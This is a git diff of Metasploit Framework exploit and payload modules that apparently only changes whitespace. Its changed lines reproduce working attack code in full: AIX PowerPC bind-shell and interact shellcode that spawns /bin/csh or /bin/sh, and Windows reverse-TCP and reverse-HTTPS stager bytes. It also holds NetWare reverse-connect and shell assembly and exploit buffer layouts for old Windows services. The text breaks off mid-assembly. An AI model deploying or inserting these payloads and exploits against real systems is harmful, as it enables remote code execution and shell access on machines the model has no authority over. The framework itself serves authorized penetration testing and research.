'Author' => [ diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 84eb40a594..078736e931 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote NOTE: There are actually two consecutive wcscpy() calls in the program (which may be why ZDI considered them two separate issues). However, this module only - exploits the second one. + exploits the second one. }, 'Author' => [ diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index 768d356d49..e73a6498bc 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - ['CVE', '2007-2711'], + ['CVE', '2007-2711'], ['OSVDB', '36053'], ['BID', '23981'], ], diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index 64028e36e4..9c1a335627 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb @@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 08 2005' )) end - + # Do not automatically run this module, it can lead to lockouts with SQL Server 2005 def autofilter false diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index c913d6d863..e8be78f7c3 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -36,13 +36,13 @@ class Metasploit3 < Msf::Exploit::Remote 1. pointer to a 32-bit value that is set to 0 2. pointer to a 32-bit value that is set to a length influcenced by the buffer - length. + length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, - this value is referenced with a displacement of 0x38. For MSSQL 2005, the - displacement is 0x10. The address of our buffer is conveniently stored in - ecx when this instruction is executed. + this value is referenced with a displacement of 0x38. For MSSQL 2005, the + displacement is 0x10. The address of our buffer is conveniently stored in + ecx when this instruction is executed. 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with - a displacement of 4. This pointer is not used by this exploit. + a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index ce730f746a..75e6748f4e 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in Proxy-Pro Professional - GateKeeper 4.7. By sending a long HTTP GET to the default port + This module exploits a stack buffer overflow in Proxy-Pro Professional + GateKeeper 4.7. By sending a long HTTP GET to the default port of 3128, a remote attacker could overflow a buffer and execute arbitrary code. }, diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index 43e9631b3b..700370fa27 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Qbik WinGate WWW Proxy Server URL Processing Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in Qbik WinGate version + This module exploits a stack buffer overflow in Qbik WinGate version 6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the HTTP proxy service on port 80, a remote attacker could overflow a buffer and execute arbitrary code. diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 59f28e18b8..094d4e5503 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - # Technically we can use more space than this, but by limiting it + # Technically we can use more space than this, but by limiting it # to 370 bytes we can use the same request for all Windows SPs. 'Space' => 370, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'Targets' => [ - [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ], + [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ], [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', { 'Offset' => 1000, diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index f7fe72a825..c03f2e2af4 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -133,9 +133,9 @@ class Metasploit3 < Msf::Exploit::Remote # eb0f => jmp short 11 to shellcode buf = "\x80\x66\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x86\x01\x00\x00\x00"+ - "\xeb\x0f" + 'XXXXXXXXXXX' + - [target.ret ^ 0xffffffff].pack('V')+ - payload.encoded + "\xeb\x0f" + 'XXXXXXXXXXX' + + [target.ret ^ 0xffffffff].pack('V')+ + payload.encoded # Connect to a SMTP service, call STARTTLS if (datastore['PROTO'] == 'smtp') diff --git a/modules/exploits/windows/tftp/tftpd32_long_filename.rb b/modules/exploits/windows/tftp/tftpd32_long_filename.rb index 2570f15159..999e28b29f 100644 --- a/modules/exploits/windows/tftp/tftpd32_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpd32_long_filename.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Version' => '$Revision$', 'References' => [ - ['CVE', '2002-2226'], + ['CVE', '2002-2226'], ['OSVDB', '45903'], ['BID', '6199'], ], diff --git a/modules/exploits/windows/unicenter/cam_log_security.rb b/modules/exploits/windows/unicenter/cam_log_security.rb index 989accd484..b26fa78550 100644 --- a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Targets' => [ - # W2API.DLL @ 0x01950000 - return to ESI + # W2API.DLL @ 0x01950000 - return to ESI ['W2API.DLL TNG 2.3', { 'Platform' => 'win', 'Ret' => 0x01951107 }], # Return to ESI in ws2help.dll diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index a8a259db85..d5da8336dd 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -192,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote # Determine if the patch has already been applied req = "\x00\x00\x00\x0F\x00\x00\x78\x00" + data[16, 4] + - "\x00\x00\x00\x03\x00\x00\x00\x00" + "\x00\x00\x00\x03\x00\x00\x00\x00" sock.put(req) data = sock.get_once diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 023c7f6680..75e5401498 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -157,7 +157,7 @@ class Metasploit3 < Msf::Nop end def ins_sethi(ref, len=0) - [(get_dst_reg() << 25) | (4 << 22) | rand(1 << 22)].pack('N') + [(get_dst_reg() << 25) | (4 << 22) | rand(1 << 22)].pack('N') end def ins_arithmetic(ref, len=0) diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 3b42a5ba50..2a4d9f4963 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -136,8 +136,8 @@ SINGLE_BYTE_SLED = end end while ((badchars.include?(cur_char)) or - ((sled_hash[cur_char]) and - ((sled_hash[cur_char] & badregs).length > 0))) + ((sled_hash[cur_char]) and + ((sled_hash[cur_char] & badregs).length > 0))) # Add the character to the sled now that it's passed our checks out_sled += cur_char diff --git a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb index 45b0b0169b..a33f844864 100644 --- a/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb @@ -38,7 +38,7 @@ module Metasploit3 'LPORT' => [ 82, 'n' ], }, } - )) + )) end @@ -46,79 +46,79 @@ module Metasploit3 super(*args) payload = - "\x7f\xff\xfa\x79" +# xor. r31,r31,r31 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\xc8\x02\xa6" +# mflr r30 # - "\x3b\xde\x01\xff" +# cal r30,511(r30) # - "\x3b\xde\xfe\x1d" +# cal r30,-483(r30) # - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x20" +# bctr # - "\x4c\xc6\x33\x42" +# crorc 6,6,6 # - "\x44\xff\xff\x02" +# svca 0 # - "\x3b\xde\xff\xf8" +# cal r30,-8(r30) # - "\x3b\xa0\x07\xff" +# lil r29,2047 # - "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # - "\x38\x9d\xf8\x02" +# cal r4,-2046(r29) # - "\x38\x7d\xf8\x03" +# cal r3,-2045(r29) # - @cal_socket + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x7c\x1b\x78" +# mr r28,r3 # - "\x38\xbd\xf8\x11" +# cal r5,-2031(r29) # - "\x3f\x60\xff\x02" +# liu r27,-254 # - "\x63\x7b\x11\x5c" +# oril r27,r27,4444 # - "\x97\xe1\xff\xfc" +# stu r31,-4(r1) # - "\x97\x61\xff\xfc" +# stu r27,-4(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - @cal_bind + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x83\xe3\x78" +# mr r3,r28 # - @cal_listen + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x83\xe3\x78" +# mr r3,r28 # - @cal_accept + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7c\x7a\x1b\x78" +# mr r26,r3 # - "\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) # - "\x7f\x23\xcb\x78" +# mr r3,r25 # - @cal_close + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x7f\x25\xcb\x78" +# mr r5,r25 # - "\x7c\x84\x22\x78" +# xor r4,r4,r4 # - "\x7f\x43\xd3\x78" +# mr r3,r26 # - @cal_kfcntl + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "\x37\x39\xff\xff" +# ai. r25,r25,-1 # - "\x40\x80\xff\xd4" +# bge # - "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # - "\x40\x82\xff\xfd" +# bnel # - "\x7f\x08\x02\xa6" +# mflr r24 # - "\x3b\x18\x01\xff" +# cal r24,511(r24) # - "\x38\x78\xfe\x29" +# cal r3,-471(r24) # - "\x98\xb8\xfe\x31" +# stb r5,-463(r24) # - "\x94\xa1\xff\xfc" +# stu r5,-4(r1) # - "\x94\x61\xff\xfc" +# stu r3,-4(r1) # - "\x7c\x24\x0b\x78" +# mr r4,r1 # - @cal_execve + - "\x7f\xc9\x03\xa6" +# mtctr r30 # - "\x4e\x80\x04\x21" +# bctrl # - "/bin/csh" + "\x7f\xff\xfa\x79" +# xor. r31,r31,r31 # + "\x40\x82\xff\xfd" +# bnel # + "\x7f\xc8\x02\xa6" +# mflr r30 # + "\x3b\xde\x01\xff" +# cal r30,511(r30) # + "\x3b\xde\xfe\x1d" +# cal r30,-483(r30) # + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x20" +# bctr # + "\x4c\xc6\x33\x42" +# crorc 6,6,6 # + "\x44\xff\xff\x02" +# svca 0 # + "\x3b\xde\xff\xf8" +# cal r30,-8(r30) # + "\x3b\xa0\x07\xff" +# lil r29,2047 # + "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # + "\x38\x9d\xf8\x02" +# cal r4,-2046(r29) # + "\x38\x7d\xf8\x03" +# cal r3,-2045(r29) # + @cal_socket + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x7c\x7c\x1b\x78" +# mr r28,r3 # + "\x38\xbd\xf8\x11" +# cal r5,-2031(r29) # + "\x3f\x60\xff\x02" +# liu r27,-254 # + "\x63\x7b\x11\x5c" +# oril r27,r27,4444 # + "\x97\xe1\xff\xfc" +# stu r31,-4(r1) # + "\x97\x61\xff\xfc" +# stu r27,-4(r1) # + "\x7c\x24\x0b\x78" +# mr r4,r1 # + @cal_bind + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x7c\x84\x22\x78" +# xor r4,r4,r4 # + "\x7f\x83\xe3\x78" +# mr r3,r28 # + @cal_listen + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x7c\xa5\x2a\x78" +# xor r5,r5,r5 # + "\x7c\x84\x22\x78" +# xor r4,r4,r4 # + "\x7f\x83\xe3\x78" +# mr r3,r28 # + @cal_accept + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x7c\x7a\x1b\x78" +# mr r26,r3 # + "\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) # + "\x7f\x23\xcb\x78" +# mr r3,r25 # + @cal_close + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x7f\x25\xcb\x78" +# mr r5,r25 # + "\x7c\x84\x22\x78" +# xor r4,r4,r4 # + "\x7f\x43\xd3\x78" +# mr r3,r26 # + @cal_kfcntl + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "\x37\x39\xff\xff" +# ai. r25,r25,-1 # + "\x40\x80\xff\xd4" +# bge # + "\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 # + "\x40\x82\xff\xfd" +# bnel # + "\x7f\x08\x02\xa6" +# mflr r24 # + "\x3b\x18\x01\xff" +# cal r24,511(r24) # + "\x38\x78\xfe\x29" +# cal r3,-471(r24) # + "\x98\xb8\xfe\x31" +# stb r5,-463(r24) # + "\x94\xa1\xff\xfc" +# stu r5,-4(r1) # + "\x94\x61\xff\xfc" +# stu r3,-4(r1) # + "\x7c\x24\x0b\x78" +# mr r4,r1 # + @cal_execve + + "\x7f\xc9\x03\xa6" +# mtctr r30 # + "\x4e\x80\x04\x21" +# bctrl # + "/bin/csh" - # If the payload is generated and there are offsets to substitute, - # do that now. - if (payload and offsets) - substitute_vars(payload, offsets) - end + # If the payload is generated and there are offsets to substitute, + # do that now. + if (payload and offsets) + substitute_vars(payload, offsets) + end - payload + payload end end diff --git a/modules/payloads/singles/aix/ppc/shell_interact.rb b/modules/payloads/singles/aix/ppc/shell_interact.rb index 6903ad3fd1..e41b66deee 100644 --- a/modules/payloads/singles/aix/ppc/shell_interact.rb +++ b/modules/payloads/singles/aix/ppc/shell_interact.rb @@ -32,7 +32,7 @@ module Metasploit3 'PayloadType' => 'cmd_interact', 'Handler' => Msf::Handler::FindShell, 'Session' => Msf::Sessions::CommandShell - )) + )) end @@ -40,20 +40,20 @@ module Metasploit3 super(*args) payload = - "\x7c\xa5\x2a\x79" +# /* xor. r5,r5,r5 */ - "\x40\x82\xff\xfd" +# /* bnel */ - "\x7f\xe8\x02\xa6" +# /* mflr r31 */ - "\x3b\xff\x01\x20" +# /* cal r31,0x120(r31) */ - "\x38\x7f\xff\x08" +# /* cal r3,-248(r31) */ - "\x38\x9f\xff\x10" +# /* cal r4,-240(r31) */ - "\x90\x7f\xff\x10" +# /* st r3,-240(r31) */ - "\x90\xbf\xff\x14" +# /* st r5,-236(r31) */ - "\x88\x5f\xff\x0f" +# /* lbz r2,-241(r31) */ - "\x98\xbf\xff\x0f" +# /* stb r5,-241(r31) */ - "\x4c\xc6\x33\x42" +# /* crorc cr6,cr6,cr6 */ - "\x44\xff\xff\x02" +# /* svca */ - "/bin/sh"+ - "\x05" + "\x7c\xa5\x2a\x79" +# /* xor. r5,r5,r5 */ + "\x40\x82\xff\xfd" +# /* bnel */ + "\x7f\xe8\x02\xa6" +# /* mflr r31 */ + "\x3b\xff\x01\x20" +# /* cal r31,0x120(r31) */ + "\x38\x7f\xff\x08" +# /* cal r3,-248(r31) */ + "\x38\x9f\xff\x10" +# /* cal r4,-240(r31) */ + "\x90\x7f\xff\x10" +# /* st r3,-240(r31) */ + "\x90\xbf\xff\x14" +# /* st r5,-236(r31) */ + "\x88\x5f\xff\x0f" +# /* lbz r2,-241(r31) */ + "\x98\xbf\xff\x0f" +# /* stb r5,-241(r31) */ + "\x4c\xc6\x33\x42" +# /* crorc cr6,cr6,cr6 */ + "\x44\xff\xff\x02" +# /* svca */ + "/bin/sh"+ + "\x05" end diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb index af10f10e98..b2b302fd80 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb @@ -45,49 +45,49 @@ module Metasploit3 'LPORT' => [ 0, 'n' ], }, 'Assembly' => < points inside SERVER.NLM - cli - sub esp, 8 - mov ecx, esp - sgdt [ecx] + // search DebuggerSymbolHashTable pointer using GDT system call gate + // -> points inside SERVER.NLM + cli + sub esp, 8 + mov ecx, esp + sgdt [ecx] - cli - mov ebx, [ecx+2] + cli + mov ebx, [ecx+2] - mov bp, word ptr [ebx+0x4E] - shl ebp, 16 - mov bp, word ptr [ebx+0x48] + mov bp, word ptr [ebx+0x4E] + shl ebp, 16 + mov bp, word ptr [ebx+0x48] f_finddebugger: - cmp dword ptr[ebp], 0 - jnz f_next - cmp dword ptr[ebp+4], 0x808bc201 - jz f_end + cmp dword ptr[ebp], 0 + jnz f_next + cmp dword ptr[ebp+4], 0x808bc201 + jz f_end f_next: - dec ebp - jmp f_finddebugger + dec ebp + jmp f_finddebugger f_end: - mov ebp, [ebp-7] + mov ebp, [ebp-7] - // resolve function pointers - call current + // resolve function pointers + call current current: - pop edi - add edi, (fct_ptrs - current) - mov cl, 6 + pop edi + add edi, (fct_ptrs - current) + mov cl, 6 resolv_ptrs: - push [edi] - call resolv_addr - stosd - dec cl - test cl, cl - jnz resolv_ptrs + push [edi] + call resolv_addr + stosd + dec cl + test cl, cl + jnz resolv_ptrs - sti + sti - // remove CIFS lock - call [edi-4] // NSS.NLM|NSSMPK_UnlockNss + // remove CIFS lock + call [edi-4] // NSS.NLM|NSSMPK_UnlockNss - // allocate heap buffer to remove the code from the stack (if on the stack) - // network functions will give back control to the kernel and we don't want - // the driver to erase our shellcode + // allocate heap buffer to remove the code from the stack (if on the stack) + // network functions will give back control to the kernel and we don't want + // the driver to erase our shellcode - push 65535 - call [edi-8] ; AFPTCP.NLM|LB_malloc - mov ecx, (end_reverse - reverse_connect) - mov esi, edi - sub esi, ecx - mov edi, eax - test eax, eax - jz end + push 65535 + call [edi-8] ; AFPTCP.NLM|LB_malloc + mov ecx, (end_reverse - reverse_connect) + mov esi, edi + sub esi, ecx + mov edi, eax + test eax, eax + jz end - repe movsb - jmp eax + repe movsb + jmp eax reverse_connect: - xor ebx, ebx - - push ebp - mov ebp, esp - push ebp - push ebx // protocol - push 1 // SOCK_STREAM - push 2 // AF_INET - call [edi-0xc] // LIBC.NLM|bsd_socket_mp - mov esi, eax - test eax, eax - jz end - - push ebx - push ebx - push LHOST - push.i16 LPORT - push.i16 2 - mov ecx, esp - push ebp - push 16 - push ecx - push esi - call [edi-0x10] // LIBC.NLM|bsd_connect_mp - cmp eax, -1 - jz end - - push 65535 - push edi - mov ecx, esp - - push ebx - push ebx - push ebx - inc ebx - push ebx - dec ebx - push ecx - push ebx - push ebx - mov ecx, esp - - push ebp - push ebx - push ecx - push esi - call [edi-0x14] // LIBC.NLM|bsd_recvmsg_mp - - jmp edi + xor ebx, ebx + + push ebp + mov ebp, esp + push ebp + push ebx // protocol + push 1 // SOCK_STREAM + push 2 // AF_INET + call [edi-0xc] // LIBC.NLM|bsd_socket_mp + mov esi, eax + test eax, eax + jz end + + push ebx + push ebx + push LHOST + push.i16 LPORT + push.i16 2 + mov ecx, esp + push ebp + push 16 + push ecx + push esi + call [edi-0x10] // LIBC.NLM|bsd_connect_mp + cmp eax, -1 + jz end + + push 65535 + push edi + mov ecx, esp + + push ebx + push ebx + push ebx + inc ebx + push ebx + dec ebx + push ecx + push ebx + push ebx + mov ecx, esp + + push ebp + push ebx + push ecx + push esi + call [edi-0x14] // LIBC.NLM|bsd_recvmsg_mp + + jmp edi end: - ; go back to the main kernel loop - call [edi-0x18] // SERVER.NLM|kWorkerThread + ; go back to the main kernel loop + call [edi-0x18] // SERVER.NLM|kWorkerThread fct_ptrs: - dd 0x9294bdcb // SERVER.NLM|kWorkerThread - dd 0x3605cc1c // LIBC.NLM|bsd_recvmsg_mp - dd 0x19a75280 // LIBC.NLM|bsd_connect_mp - dd 0x46f23d88 // LIBC.NLM|bsd_socket_mp - dd 0x6877687c // AFPTCP.NLM|LB_malloc - dd 0x8967f0ce // NSS.NLM|NSSMPK_UnlockNss + dd 0x9294bdcb // SERVER.NLM|kWorkerThread + dd 0x3605cc1c // LIBC.NLM|bsd_recvmsg_mp + dd 0x19a75280 // LIBC.NLM|bsd_connect_mp + dd 0x46f23d88 // LIBC.NLM|bsd_socket_mp + dd 0x6877687c // AFPTCP.NLM|LB_malloc + dd 0x8967f0ce // NSS.NLM|NSSMPK_UnlockNss end_reverse: - nop + nop EOS } )) diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 65f85f3125..8fe7ec8b3b 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -34,8 +34,8 @@ module Metasploit3 { 'Offsets' => { - 'EXITFUNC' => [ 290, 'V' ], - 'LPORT' => [ 190, 'v' ], # Not a typo, really little endian + 'EXITFUNC' => [ 290, 'V' ], + 'LPORT' => [ 190, 'v' ], # Not a typo, really little endian }, 'Payload' => "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index e0afce2c2d..d45e7f9e7f 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -34,7 +34,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'] }, - 'Payload' => + 'Payload' => # Length: 290 bytes "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb index 741ed8b5f9..e42982fa8d 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb @@ -34,7 +34,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LHOST' => [ 195, 'ADDR' ], 'LPORT' => [ 202, 'n' ], }, - 'Payload' => + 'Payload' => # Length: 294 bytes # Port Offset: 202 # Host Offset: 195 diff --git a/modules/payloads/stagers/windows/reverse_tcp_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_dns.rb index 98f178cab0..b97425173e 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb @@ -38,7 +38,7 @@ module Metasploit3 { 'RequiresMidstager' => false, 'Offsets' => { 'LPORT' => [ 212, 'n' ], 'ReverseConnectRetries' => [ 207, 'C'] }, - 'Payload' => + 'Payload' => # Name: stager_reverse_tcp_dns # Length: 367 bytes # Port Offset: 212 diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index fddfba0a2a..386029cd45 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -77,7 +77,7 @@ module Metasploit3 if(datastore['PrependFork']) # fork() / parent does exit_group() (for threads) - midstager << + midstager << "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\xfc\xcd\x80" end diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb index 2079d18db9..370898849c 100644 --- a/modules/payloads/stages/netware/shell.rb +++ b/modules/payloads/stages/netware/shell.rb @@ -38,7 +38,7 @@ module Metasploit3 { #'EXITFUNC' => [ 443, 'V' ] }, - 'Assembly' => < < points inside SERVER.NLM - cli - sub esp, 8 - mov ecx, esp - sgdt [ecx] + ; search DebuggerSymbolHashTable pointer using GDT system call gate + ; -> points inside SERVER.NLM + cli + sub esp, 8 + mov ecx, esp + sgdt [ecx] - cli - mov ebx, [ecx+2] - mov bp, word ptr [ebx+0x4E] - shl ebp, 16 - mov bp, word ptr [ebx+0x48] + cli + mov ebx, [ecx+2] + mov bp, word ptr [ebx+0x4E] + shl ebp, 16 + mov bp, word ptr [ebx+0x48] f_finddebugger: - cmp dword ptr[ebp], 0 - jnz f_next - cmp dword ptr[ebp+4], 0x808bc201 - jz f_end + cmp dword ptr[ebp], 0 + jnz f_next + cmp dword ptr[ebp+4], 0x808bc201 + jz f_end f_next: - dec ebp - jmp f_finddebugger + dec ebp + jmp f_finddebugger f_end: - mov ebp, [ebp-7] + mov ebp, [ebp-7] - ; resolve function pointers - mov cl, 15 + ; resolve function pointers + mov cl, 15 resolv_ptrs: - push [edi] - call resolv_addr - stosd - dec cl - test cl, cl - jnz resolv_ptrs + push [edi] + call resolv_addr + stosd + dec cl + test cl, cl + jnz resolv_ptrs - sti + sti - ; all screens have the same size - push edi - lea esi, [edi+4] - push esi - call [edi-0x18] ; SERVER.NLM|GetScreenSize + ; all screens have the same size + push edi + lea esi, [edi+4] + push esi + call [edi-0x18] ; SERVER.NLM|GetScreenSize - ; allocate 2 buffer for the main screen and the backup - xor eax, eax - xor ebx, ebx - mov ax, word ptr[edi] - mov bx, word ptr[esi] - imul eax, ebx - mov [edi+8], eax + ; allocate 2 buffer for the main screen and the backup + xor eax, eax + xor ebx, ebx + mov ax, word ptr[edi] + mov bx, word ptr[esi] + imul eax, ebx + mov [edi+8], eax - push eax - call [edi-8] ; AFPTCP.NLM|LB_malloc - mov [edi+0xc], eax + push eax + call [edi-8] ; AFPTCP.NLM|LB_malloc + mov [edi+0xc], eax - call [edi-0x14] ; SERVER.NLM|GetSystemConsoleScreen - mov [edi+0x10], eax + call [edi-0x14] ; SERVER.NLM|GetSystemConsoleScreen + mov [edi+0x10], eax - sub esp, 4 - mov ebp, esp ; n + sub esp, 4 + mov ebp, esp ; n recv_loop: - xor ebx, ebx - inc ebx + xor ebx, ebx + inc ebx - push 200000 ; tv_usec - push 0 ; tv_sec (0) - mov edx, esp ; timeout + push 200000 ; tv_usec + push 0 ; tv_sec (0) + mov edx, esp ; timeout - sub esp, 4 - mov ecx, esp ; rescode + sub esp, 4 + mov ecx, esp ; rescode - push 1 ; num socket (1) - push ecx ; &rescode - push edx ; &timeout - push 0 ; NULL - push 0 ; NULL - push 0 ; NULL - push [edi-0x40] ; socket - call [edi-0x2C] ; LIBC.NLM|bsd_select_mp - add esp, 0x28 - test eax, eax - jnz end + push 1 ; num socket (1) + push ecx ; &rescode + push edx ; &timeout + push 0 ; NULL + push 0 ; NULL + push 0 ; NULL + push [edi-0x40] ; socket + call [edi-0x2C] ; LIBC.NLM|bsd_select_mp + add esp, 0x28 + test eax, eax + jnz end - call update_screen + call update_screen - sub esp, 4 - mov edx, esp - push edx ; &rescode - push ebp ; &n - push ebx ; FIONREAD - push [edi-0x40] ; socket - call [edi-0x38] ; LIBC.NLM|_ioctlsocket - add esp, 0x14 - test eax, eax - jnz end - cmp [ebp], 0 - jz recv_loop - ; check we are not longer than the key buffer size - cmp [ebp], 32 - jbe recvd - mov [ebp], 32 + sub esp, 4 + mov edx, esp + push edx ; &rescode + push ebp ; &n + push ebx ; FIONREAD + push [edi-0x40] ; socket + call [edi-0x38] ; LIBC.NLM|_ioctlsocket + add esp, 0x14 + test 